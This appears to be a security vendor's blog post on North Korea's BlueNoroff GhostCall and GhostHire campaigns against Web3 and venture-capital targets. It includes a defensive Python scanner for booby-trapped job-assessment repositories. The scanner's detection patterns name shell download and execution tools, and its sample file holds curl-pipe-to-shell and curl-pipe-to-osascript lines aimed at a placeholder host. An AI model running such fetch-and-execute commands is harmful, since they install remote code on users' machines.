GhostCall and GhostHire: North Korea's BlueNoroff Targets C-Suite with New Malware Chains

Updated: 4 days ago

North Korean state-sponsored threat actors, operating under the umbrella of the Lazarus Group's BlueNoroff cluster, have launched sophisticated new cyber campaigns dubbed GhostCall and GhostHire. These operations specifically target executives and developers within the lucrative Web3, blockchain, and venture capital sectors, employing advanced social engineering tactics and multi-stage malware.

Key Takeaways

  • BlueNoroff, a financially motivated group linked to North Korea, is behind the GhostCall and GhostHire campaigns.

  • The campaigns target high-value individuals in the Web3, blockchain, and venture capital industries.

  • GhostCall uses fake video calls to trick macOS users, while GhostHire lures developers with fraudulent job assessments.

  • Advanced malware chains for both macOS and Windows are deployed, focusing on data exfiltration and system compromise.

  • The use of generative AI is suspected to enhance the efficiency of these attacks.

GhostCall Campaign: Deceptive Video Calls

The GhostCall campaign primarily targets macOS users, particularly executives in tech and venture capital. Attackers initiate contact via platforms like Telegram, inviting potential victims to investment-related meetings. These meetings are simulated using pre-recorded videos of previous victims, creating a convincing illusion of a live call. Victims are then prompted to update their Zoom or Microsoft Teams client with a malicious script, disguised as a necessary update to resolve technical issues. This script initiates the infection chain, downloading ZIP files containing multi-component malware.

GhostHire Campaign: Malicious Job Assessments

In parallel, the GhostHire campaign targets Web3 developers. Threat actors pose as recruiters on Telegram, offering job opportunities and directing targets to download and execute a booby-trapped GitHub repository under the guise of a timed skill assessment. The urgency of the 30-minute deadline pressures victims into quickly running the malicious code. Once executed, the project identifies the victim's operating system and deploys an appropriate next-stage payload, such as DownTroy, written in PowerShell for Windows, bash for Linux, or AppleScript for macOS.
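Because the GhostHire repository branches on the victim's operating system before fetching and running its next stage, a pre-run triage of a cloned "assessment" repository can look for exactly that combination of traits. The Python scanner below is an added example for this article, not code from BetterWorld or from any of the cited research; its regular expressions, file names and sample file contents are constructed assumptions, and `example.invalid` is a placeholder domain.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Heuristic patterns (assumptions for this example, not indicators from any report).
OS_FINGERPRINT = re.compile(
    r"uname\b|process\.platform|platform\.system\(|sys\.platform|\$env:OS|\$IsWindows", re.I)
REMOTE_FETCH = re.compile(
    r"curl\s|wget\s|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|https?://", re.I)
EXEC_STAGE = re.compile(
    r"\|\s*(?:ba)?sh\b|osascript|Invoke-Expression|\biex\b|powershell|child_process|subprocess", re.I)
SCRIPT_SUFFIXES = {".sh", ".ps1", ".js", ".py", ".json", ""}

def score_text(text: str) -> Dict[str, bool]:
    """Which of the three loader traits a single file exhibits."""
    return {
        "os_fingerprint": bool(OS_FINGERPRINT.search(text)),
        "remote_fetch": bool(REMOTE_FETCH.search(text)),
        "exec_stage": bool(EXEC_STAGE.search(text)),
    }

def triage_repo(root: Path) -> List[str]:
    """Relative paths of files that branch on the OS *and* fetch-and-run a stage."""
    flagged = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            hits = score_text(path.read_text(errors="ignore"))
            if all(hits.values()):  # only the full combination is flagged
                flagged.append(path.relative_to(root).as_posix())
    return sorted(flagged)

# Constructed sample repository: a benign build helper that only inspects the OS,
# and a launcher that selects a platform-specific stage, downloads it and runs it.
SAMPLE_FILES = {
    "package.json": '{"scripts": {"test": "node test.js"}}',
    "build.sh": '#!/bin/sh\ncase "$(uname -s)" in Darwin) make mac ;; Linux) make linux ;; esac\n',
    "setup.sh": ('#!/bin/sh\ncase "$(uname -s)" in\n'
                 '  Darwin) curl -s https://example.invalid/a | osascript ;;\n'
                 '  Linux)  curl -s https://example.invalid/b | sh ;;\nesac\n'),
}

def demo() -> List[str]:
    """Write the constructed sample to a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            Path(tmp, name).write_text(body)
        return triage_repo(Path(tmp))

if __name__ == "__main__":
    print(demo())  # → ['setup.sh']
```

The benign `build.sh` is not flagged because it never downloads or executes anything, which keeps the check usable on ordinary projects; a hit is a reason to read the file before running any timed task, not proof of compromise.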

Advanced Malware and Data Exfiltration

Both campaigns deploy complex, multi-stage malware chains designed for extensive data exfiltration. These include sophisticated stealer suites and backdoors capable of harvesting sensitive information such as cryptocurrency wallet credentials, browser passwords, API keys for cloud services (including OpenAI), development environment secrets, and credentials from communication platforms. The malware is designed to bypass security measures and gain root privileges, enabling deep system compromise. Researchers note the actors' sustained effort to develop cross-platform malware and a unified command-and-control infrastructure, potentially accelerated by generative AI.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains, The Hacker News.

  • Targets C-Suite and Managers with New Infiltration Methods, GBHackers News.

  • BlueNoroff APT's Campaigns Target Web3, Venture Capital Sectors, TechNadu.
